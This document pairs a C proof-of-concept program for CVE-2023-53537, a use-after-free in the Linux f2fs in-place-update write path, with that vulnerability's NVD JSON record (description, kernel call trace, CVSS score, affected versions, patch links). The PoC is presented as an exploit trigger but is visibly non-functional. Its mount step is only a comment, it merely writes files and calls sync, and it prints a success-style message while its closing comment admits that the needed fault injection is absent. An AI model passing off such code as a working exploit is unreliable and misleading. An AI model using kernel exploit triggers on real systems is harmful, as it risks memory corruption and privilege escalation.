CVE-2023-53537

// CVE-2023-53537 PoC - Trigger UAF in f2fs IPU bio path // This PoC triggers the use-after-free by causing checkpoint error // while IPU bio merging is in progress #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <sys/stat.h> #include <sys/mount.h> #define F2FS_MOUNT_POINT "/mnt/f2fs_test" #define NUM_FILES 100 #define FILE_SIZE 4096 // Step 1: Create a f2fs filesystem and mount it // (requires root or appropriate privileges) int setup_f2fs() { // Create mount point mkdir(F2FS_MOUNT_POINT, 0755); // Mount f2fs (assumes device exists at /dev/loop0) // mount -t f2fs /dev/loop0 F2FS_MOUNT_POINT return 0; } // Step 2: Create small files to trigger IPU operations int trigger_ipu_merge() { char path[256]; char buf[FILE_SIZE]; memset(buf, 'A', FILE_SIZE); for (int i = 0; i < NUM_FILES; i++) { snprintf(path, sizeof(path), "%s/file_%d", F2FS_MOUNT_POINT, i); int fd = open(path, O_CREAT | O_WRONLY | O_TRUNC, 0644); if (fd < 0) continue; // Write small data to trigger in-place update write(fd, buf, FILE_SIZE); close(fd); } return 0; } // Step 3: Force sync to trigger writeback and IPU bio submission int force_sync() { sync(); return 0; } int main() { setup_f2fs(); trigger_ipu_merge(); force_sync(); // The UAF is triggered when cp_error is set during writeback // causing f2fs_submit_merged_ipu_write() to submit an invalid bio printf("PoC executed - check kernel logs for BUG at filemap.c:1619\n"); return 0; } // Note: The actual trigger requires inducing a checkpoint error // (e.g., via dm-error or similar block device fault injection) // while the IPU bio merge path is active.

{"cve": {"id": "CVE-2023-53537", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:48.697", "lastModified": "2026-03-23T18:37:15.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: fix to avoid use-after-free for cached IPU bio\n\nxfstest generic/019 reports a bug:\n\nkernel BUG at mm/filemap.c:1619!\nRIP: 0010:folio_end_writeback+0x8a/0x90\nCall Trace:\n end_page_writeback+0x1c/0x60\n f2fs_write_end_io+0x199/0x420\n bio_endio+0x104/0x180\n submit_bio_noacct+0xa5/0x510\n submit_bio+0x48/0x80\n f2fs_submit_write_bio+0x35/0x300\n f2fs_submit_merged_ipu_write+0x2a0/0x2b0\n f2fs_write_single_data_page+0x838/0x8b0\n f2fs_write_cache_pages+0x379/0xa30\n f2fs_write_data_pages+0x30c/0x340\n do_writepages+0xd8/0x1b0\n __writeback_single_inode+0x44/0x370\n writeback_sb_inodes+0x233/0x4d0\n __writeback_inodes_wb+0x56/0xf0\n wb_writeback+0x1dd/0x2d0\n wb_workfn+0x367/0x4a0\n process_one_work+0x21d/0x430\n worker_thread+0x4e/0x3c0\n kthread+0x103/0x130\n ret_from_fork+0x2c/0x50\n\nThe root cause is: after cp_error is set, f2fs_submit_merged_ipu_write()\nin f2fs_write_single_data_page() tries to flush IPU bio in cache, however\nf2fs_submit_merged_ipu_write() missed to check validity of @bio parameter,\nresult in submitting random cached bio which belong to other IO context,\nthen it will cause use-after-free issue, fix it by adding additional\nvalidity check."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.180", "matchCriteriaId": "78422AC3-CC89-479E-B4BC-62381D8F3564"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.111", "matchCriteriaId": "2B9DD776-7F17-4F72-B94F-54BFCBC692DD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.28", "matchCriteriaId": "08F855F4-7188-4EE1-BD79-D4B6C7E2EF54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.15", "matchCriteriaId": "3844A90B-940D-46C3-8D7B-9FF63F1AFC2F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3", "versionEndExcluding": "6.3.2", "matchCriteriaId": "38F6F330-91A0-4675-8B90-6F950471A7CC"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/5cdb422c839134273866208dad5360835ddb9794", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7d058f0ab161437369ad6e45a4b67c2886e71373", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/97ec6f1788cc6bee3f8c89cb908e1a2a1cd859bb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9a7f63283af6befc0f91d549f4f6917dff7479a9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/af4ce124d7bd74cb839bbdaccffbb416771a56b5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b2f423fda64fb49213aa0ed5056079cf295a5df2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}